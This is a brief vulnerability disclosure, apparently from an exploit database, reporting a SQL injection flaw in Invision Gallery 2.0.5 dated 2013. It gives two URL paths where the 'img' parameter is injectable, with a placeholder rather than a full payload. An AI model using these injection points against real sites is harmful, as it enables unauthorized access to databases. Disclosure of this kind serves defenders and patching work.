Invision Gallery SQL Injection Exploit

Summary

Invision Gallery is prone to a SQL injection vulnerability

Credit:

Details

Vulnerable Systems:
 * Invision Gallery 2.0.5

SQLi POC:
location: site/index.php?automodule=gallery&cmd=si&img=[SQL] or

site/act=module&module=gallery&cmd=si&img=[SQL]

Disclosure Timeline:
Published: 2013-01-17

Categories: Exploits